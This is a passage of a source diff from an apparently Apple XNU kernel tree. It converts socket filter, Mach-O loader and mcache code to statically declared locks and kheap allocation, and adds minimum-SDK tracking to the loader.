                        if ((entry->sfe_flags & SFEF_NODETACH) == 0 &&
                            entry->sfe_filter->sf_filter.sf_detach) {
                                entry->sfe_flags |= SFEF_NODETACH;
-                               lck_rw_unlock_exclusive(sock_filter_lock);
+                               lck_rw_unlock_exclusive(&sock_filter_lock);
 
                                /*
                                 * Warning - passing a potentially
@@ -274,7 +263,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
                                entry->sfe_filter->sf_filter.sf_detach(
                                        entry->sfe_cookie, entry->sfe_socket);
 
-                               lck_rw_lock_exclusive(sock_filter_lock);
+                               lck_rw_lock_exclusive(&sock_filter_lock);
                        }
 
                        /*
@@ -308,11 +297,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2)
                        sflt_release_locked(entry->sfe_filter);
                        entry->sfe_socket = NULL;
                        entry->sfe_filter = NULL;
-                       FREE(entry, M_IFADDR);
+                       kheap_free(KM_IFADDR, entry, sizeof(struct socket_filter_entry));
                }
 
                /* Drop the socket filter lock */
-               lck_rw_unlock_exclusive(sock_filter_lock);
+               lck_rw_unlock_exclusive(&sock_filter_lock);
        }
        /* NOTREACHED */
 }
@@ -339,8 +328,8 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter,
                }
        }
        /* allocate the socket filter entry */
-       MALLOC(entry, struct socket_filter_entry *, sizeof(*entry), M_IFADDR,
-           M_WAITOK);
+       entry = kheap_alloc(KM_IFADDR, sizeof(struct socket_filter_entry),
+           Z_WAITOK);
        if (entry == NULL) {
                return ENOMEM;
        }
@@ -369,7 +358,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter,
                 * Release the filter lock --
                 * callers must be aware we will do this
                 */
-               lck_rw_unlock_exclusive(sock_filter_lock);
+               lck_rw_unlock_exclusive(&sock_filter_lock);
 
                /* Unlock the socket */
                if (socklocked) {
@@ -386,7 +375,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter,
                }
 
                /* Lock the filters again */
-               lck_rw_lock_exclusive(sock_filter_lock);
+               lck_rw_lock_exclusive(&sock_filter_lock);
 
                /*
                 * If the attach function returns an error,
@@ -414,7 +403,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle)
 
        int result = EINVAL;
 
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
 
        struct socket_filter *filter = NULL;
        TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) {
@@ -427,7 +416,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle)
                result = sflt_attach_locked(socket, filter, 1);
        }
 
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        return result;
 }
@@ -452,11 +441,11 @@ sflt_initsock(struct socket *so)
         */
        struct protosw *proto = so->so_proto->pr_protosw;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        if (TAILQ_FIRST(&proto->pr_filter_head) != NULL) {
                /* Promote lock to exclusive */
-               if (!lck_rw_lock_shared_to_exclusive(sock_filter_lock)) {
-                       lck_rw_lock_exclusive(sock_filter_lock);
+               if (!lck_rw_lock_shared_to_exclusive(&sock_filter_lock)) {
+                       lck_rw_lock_exclusive(&sock_filter_lock);
                }
 
                /*
@@ -495,7 +484,7 @@ sflt_initsock(struct socket *so)
                        filter = filter_next;
                }
        }
-       lck_rw_done(sock_filter_lock);
+       lck_rw_done(&sock_filter_lock);
 }
 
 /*
@@ -506,7 +495,7 @@ sflt_initsock(struct socket *so)
 __private_extern__ void
 sflt_termsock(struct socket *so)
 {
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
 
        struct socket_filter_entry *entry;
 
@@ -537,16 +526,16 @@ sflt_termsock(struct socket *so)
                        entry->sfe_flags |= SFEF_NODETACH;
 
                        /* Drop the lock before calling the detach function */
-                       lck_rw_unlock_exclusive(sock_filter_lock);
+                       lck_rw_unlock_exclusive(&sock_filter_lock);
                        sfe_filter->sf_filter.sf_detach(sfe_cookie, so);
-                       lck_rw_lock_exclusive(sock_filter_lock);
+                       lck_rw_lock_exclusive(&sock_filter_lock);
 
                        /* Release the filter */
                        sflt_release_locked(sfe_filter);
                }
        }
 
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 }
 
 
@@ -561,7 +550,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param,
        struct socket_filter_entry *entry;
        int unlocked = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry; entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
                    entry->sfe_filter->sf_filter.sf_notify &&
@@ -572,7 +561,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param,
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -588,11 +577,11 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked != 0) {
                socket_lock(so, 0);
@@ -623,7 +612,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -633,7 +622,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -649,11 +638,11 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -673,7 +662,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -683,7 +672,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam)
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -699,11 +688,11 @@ sflt_bind(struct socket *so, const struct sockaddr *nam)
                         * Take the socket filter lock again and
                         * release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -723,7 +712,7 @@ sflt_listen(struct socket *so)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -733,7 +722,7 @@ sflt_listen(struct socket *so)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -749,11 +738,11 @@ sflt_listen(struct socket *so)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -774,7 +763,7 @@ sflt_accept(struct socket *head, struct socket *so,
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -784,7 +773,7 @@ sflt_accept(struct socket *head, struct socket *so,
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -800,11 +789,11 @@ sflt_accept(struct socket *head, struct socket *so,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -824,7 +813,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -834,7 +823,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local)
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -850,11 +839,11 @@ sflt_getsockname(struct socket *so, struct sockaddr **local)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -874,7 +863,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -884,7 +873,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -900,11 +889,11 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -924,7 +913,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -934,7 +923,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -950,11 +939,11 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -970,7 +959,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -980,7 +969,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -996,11 +985,11 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1054,7 +1043,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -1064,7 +1053,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1080,11 +1069,11 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1104,7 +1093,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt)
        int unlocked = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                if ((entry->sfe_flags & SFEF_ATTACHED) &&
@@ -1114,7 +1103,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt)
                         * the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1130,11 +1119,11 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt)
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1156,7 +1145,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data,
        int setsendthread = 0;
        int error = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
        for (entry = so->so_filt; entry && error == 0;
            entry = entry->sfe_next_onsocket) {
                /* skip if this is a subflow socket */
@@ -1170,7 +1159,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data,
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1191,11 +1180,11 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1219,7 +1208,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data,
        int error = 0;
        int unlocked = 0;
 
-       lck_rw_lock_shared(sock_filter_lock);
+       lck_rw_lock_shared(&sock_filter_lock);
 
        for (entry = so->so_filt; entry && (error == 0);
            entry = entry->sfe_next_onsocket) {
@@ -1234,7 +1223,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data,
                         * release the socket filter lock
                         */
                        sflt_entry_retain(entry);
-                       lck_rw_unlock_shared(sock_filter_lock);
+                       lck_rw_unlock_shared(&sock_filter_lock);
 
                        /* If the socket isn't already unlocked, unlock it */
                        if (unlocked == 0) {
@@ -1250,11 +1239,11 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data,
                         * Take the socket filter lock again
                         * and release the entry
                         */
-                       lck_rw_lock_shared(sock_filter_lock);
+                       lck_rw_lock_shared(&sock_filter_lock);
                        sflt_entry_release(entry);
                }
        }
-       lck_rw_unlock_shared(sock_filter_lock);
+       lck_rw_unlock_shared(&sock_filter_lock);
 
        if (unlocked) {
                socket_lock(so, 0);
@@ -1284,7 +1273,7 @@ sflt_detach(socket_t socket, sflt_handle handle)
                return EINVAL;
        }
 
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
        for (entry = socket->so_filt; entry; entry = entry->sfe_next_onsocket) {
                if (entry->sfe_filter->sf_filter.sf_handle == handle &&
                    (entry->sfe_flags & SFEF_ATTACHED) != 0) {
@@ -1295,7 +1284,7 @@ sflt_detach(socket_t socket, sflt_handle handle)
        if (entry != NULL) {
                sflt_detach_locked(entry);
        }
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        return result;
 }
@@ -1333,14 +1322,12 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
        }
 
        /* Allocate the socket filter */
-       MALLOC(sock_filt, struct socket_filter *, sizeof(*sock_filt),
-           M_IFADDR, M_WAITOK);
+       sock_filt = kheap_alloc(KM_IFADDR,
+           sizeof(struct socket_filter), Z_WAITOK | Z_ZERO);
        if (sock_filt == NULL) {
                return ENOBUFS;
        }
 
-       bzero(sock_filt, sizeof(*sock_filt));
-
        /* Legacy sflt_filter length; current structure minus extended */
        len = sizeof(*filter) - sizeof(struct sflt_filter_ext);
        /*
@@ -1359,7 +1346,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
        }
        bcopy(filter, &sock_filt->sf_filter, len);
 
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
        /* Look for an existing entry */
        TAILQ_FOREACH(match, &sock_filter_head, sf_global_next) {
                if (match->sf_filter.sf_handle ==
@@ -1384,10 +1371,10 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                        INC_ATOMIC_INT64_LIM(net_api_stats.nas_sfltr_register_os_total);
                }
        }
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        if (match != NULL) {
-               FREE(sock_filt, M_IFADDR);
+               kheap_free(KM_IFADDR, sock_filt, sizeof(struct socket_filter));
                return EEXIST;
        }
 
@@ -1415,8 +1402,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                            !SOCK_CHECK_TYPE(so, type)) {
                                continue;
                        }
-                       MALLOC(solist, struct solist *, sizeof(*solist),
-                           M_IFADDR, M_NOWAIT);
+                       solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT);
                        if (!solist) {
                                continue;
                        }
@@ -1434,8 +1420,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                            !SOCK_CHECK_TYPE(so, type)) {
                                continue;
                        }
-                       MALLOC(solist, struct solist *, sizeof(*solist),
-                           M_IFADDR, M_NOWAIT);
+                       solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT);
                        if (!solist) {
                                continue;
                        }
@@ -1480,7 +1465,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type,
                sock_release(so);
                solist = solisthead;
                solisthead = solisthead->next;
-               FREE(solist, M_IFADDR);
+               kheap_free(KHEAP_TEMP, solist, sizeof(struct solist));
        }
 
        return error;
@@ -1504,7 +1489,7 @@ errno_t
 sflt_unregister(sflt_handle handle)
 {
        struct socket_filter *filter;
-       lck_rw_lock_exclusive(sock_filter_lock);
+       lck_rw_lock_exclusive(&sock_filter_lock);
 
        /* Find the entry by the handle */
        TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) {
@@ -1537,7 +1522,7 @@ sflt_unregister(sflt_handle handle)
                sflt_release_locked(filter);
        }
 
-       lck_rw_unlock_exclusive(sock_filter_lock);
+       lck_rw_unlock_exclusive(&sock_filter_lock);
 
        if (filter == NULL) {
                return ENOENT;
index d01293ca79289464a30d00da96bde44d15758b4f..28b5c4fd18c656cd82503735cff4608acd081951 100644 (file)
@@ -1373,6 +1373,15 @@ parse_machfile(
                                }
                                vmc = (struct version_min_command *) lcp;
                                ret = load_version(vmc, &found_version_cmd, imgp->ip_flags, result);
+#if XNU_TARGET_OS_OSX
+                               if (ret == LOAD_SUCCESS) {
+                                       if (result->ip_platform == PLATFORM_IOS) {
+                                               vm_map_mark_alien(map);
+                                       } else {
+                                               assert(!vm_map_is_alien(map));
+                                       }
+                               }
+#endif /* XNU_TARGET_OS_OSX */
                                break;
                        }
                        case LC_BUILD_VERSION: {
@@ -1390,7 +1399,15 @@ parse_machfile(
                                }
                                result->ip_platform = bvc->platform;
                                result->lr_sdk = bvc->sdk;
+                               result->lr_min_sdk = bvc->minos;
                                found_version_cmd = TRUE;
+#if XNU_TARGET_OS_OSX
+                               if (result->ip_platform == PLATFORM_IOS) {
+                                       vm_map_mark_alien(map);
+                               } else {
+                                       assert(!vm_map_is_alien(map));
+                               }
+#endif /* XNU_TARGET_OS_OSX */
                                break;
                        }
                        default:
@@ -2502,6 +2519,7 @@ load_version(
 {
        uint32_t platform = 0;
        uint32_t sdk;
+       uint32_t min_sdk;
 
        if (vmc->cmdsize < sizeof(*vmc)) {
                return LOAD_BADMACHO;
@@ -2511,6 +2529,7 @@ load_version(
        }
        *found_version_cmd = TRUE;
        sdk = vmc->sdk;
+       min_sdk = vmc->version;
        switch (vmc->cmd) {
        case LC_VERSION_MIN_MACOSX:
                platform = PLATFORM_MACOS;
@@ -2547,10 +2566,12 @@ load_version(
        /* All LC_VERSION_MIN_* load commands are legacy and we will not be adding any more */
        default:
                sdk = (uint32_t)-1;
+               min_sdk = (uint32_t)-1;
                __builtin_unreachable();
        }
        result->ip_platform = platform;
-       result->lr_min_sdk = sdk;
+       result->lr_min_sdk = min_sdk;
+       result->lr_sdk = sdk;
        return LOAD_SUCCESS;
 }
 
@@ -3005,7 +3026,7 @@ load_dylinker(
 
        /* Allocate wad-of-data from heap to reduce excessively deep stacks */
 
-       MALLOC(dyld_data, void *, sizeof(*dyld_data), M_TEMP, M_WAITOK);
+       dyld_data = kheap_alloc(KHEAP_TEMP, sizeof(*dyld_data), Z_WAITOK);
        header = &dyld_data->__header;
        myresult = &dyld_data->__myresult;
        macho_data = &dyld_data->__macho_data;
@@ -3061,7 +3082,7 @@ load_dylinker(
        vnode_put(vp);
        kheap_free(KHEAP_TEMP, va, sizeof(*va));
 novp_out:
-       FREE(dyld_data, M_TEMP);
+       kheap_free(KHEAP_TEMP, dyld_data, sizeof(*dyld_data));
        return ret;
 }
 
index 76b4c601e5cc2b524666065aad780c189a4ff963..693a144377d05481423bd84fc7f6f02fa1894c2f 100644 (file)
  * caches when memory runs low.
  */
 #define MCACHE_LIST_LOCK() {                            \
-       lck_mtx_lock(mcache_llock);                     \
+       lck_mtx_lock(&mcache_llock);                     \
        mcache_llock_owner = current_thread();          \
 }
 
 #define MCACHE_LIST_UNLOCK() {                          \
        mcache_llock_owner = NULL;                      \
-       lck_mtx_unlock(mcache_llock);                   \
+       lck_mtx_unlock(&mcache_llock);                   \
 }
 
 #define MCACHE_LOCK(l)          lck_mtx_lock(l)
 
 static unsigned int ncpu;
 static unsigned int cache_line_size;
-static lck_mtx_t *mcache_llock;
 static struct thread *mcache_llock_owner;
-static lck_attr_t *mcache_llock_attr;
-static lck_grp_t *mcache_llock_grp;
-static lck_grp_attr_t *mcache_llock_grp_attr;
+static LCK_GRP_DECLARE(mcache_llock_grp, "mcache.list");
+static LCK_MTX_DECLARE(mcache_llock, &mcache_llock_grp);
 static struct zone *mcache_zone;
 static const uint32_t mcache_reap_interval = 15;
 static const uint32_t mcache_reap_interval_leeway = 2;
@@ -122,9 +120,6 @@ static unsigned int mcache_flags = 0;
 
 int mca_trn_max = MCA_TRN_MAX;
 
-#define DUMP_MCA_BUF_SIZE       512
-static char *mca_dump_buf;
-
 static mcache_bkttype_t mcache_bkttype[] = {
        { 1, 4096, 32768, NULL },
        { 3, 2048, 16384, NULL },
@@ -140,7 +135,7 @@ static mcache_bkttype_t mcache_bkttype[] = {
 
 static mcache_t *mcache_create_common(const char *, size_t, size_t,
     mcache_allocfn_t, mcache_freefn_t, mcache_auditfn_t, mcache_logfn_t,
-    mcache_notifyfn_t, void *, u_int32_t, int, int);
+    mcache_notifyfn_t, void *, u_int32_t, int);
 static unsigned int mcache_slab_alloc(void *, mcache_obj_t ***,
     unsigned int, int);
 static void mcache_slab_free(void *, mcache_obj_t *, boolean_t);
@@ -189,12 +184,6 @@ mcache_init(void)
        ncpu = ml_wait_max_cpus();
        (void) mcache_cache_line_size();        /* prime it */
 
-       mcache_llock_grp_attr = lck_grp_attr_alloc_init();
-       mcache_llock_grp = lck_grp_alloc_init("mcache.list",
-           mcache_llock_grp_attr);
-       mcache_llock_attr = lck_attr_alloc_init();
-       mcache_llock = lck_mtx_alloc_init(mcache_llock_grp, mcache_llock_attr);
-
        mcache_reap_tcall = thread_call_allocate(mcache_reap_timeout, NULL);
        mcache_update_tcall = thread_call_allocate(mcache_update, NULL);
        if (mcache_reap_tcall == NULL || mcache_update_tcall == NULL) {
@@ -258,11 +247,10 @@ mcache_cache_line_size(void)
  */
 __private_extern__ mcache_t *
 mcache_create(const char *name, size_t bufsize, size_t align,
-    u_int32_t flags, int wait)
+    u_int32_t flags, int wait __unused)
 {
        return mcache_create_common(name, bufsize, align, mcache_slab_alloc,
-                  mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1,
-                  wait);
+                  mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1);
 }
 
 /*
@@ -274,10 +262,10 @@ __private_extern__ mcache_t *
 mcache_create_ext(const char *name, size_t bufsize,
     mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn,
     mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg,
-    u_int32_t flags, int wait)
+    u_int32_t flags, int wait __unused)
 {
        return mcache_create_common(name, bufsize, 0, allocfn,
-                  freefn, auditfn, logfn, notifyfn, arg, flags, 0, wait);
+                  freefn, auditfn, logfn, notifyfn, arg, flags, 0);
 }
 
 /*
@@ -287,7 +275,7 @@ static mcache_t *
 mcache_create_common(const char *name, size_t bufsize, size_t align,
     mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn,
     mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg,
-    u_int32_t flags, int need_zone, int wait)
+    u_int32_t flags, int need_zone)
 {
        mcache_bkttype_t *btp;
        mcache_t *cp = NULL;
@@ -296,23 +284,11 @@ mcache_create_common(const char *name, size_t bufsize, size_t align,
        unsigned int c;
        char lck_name[64];
 
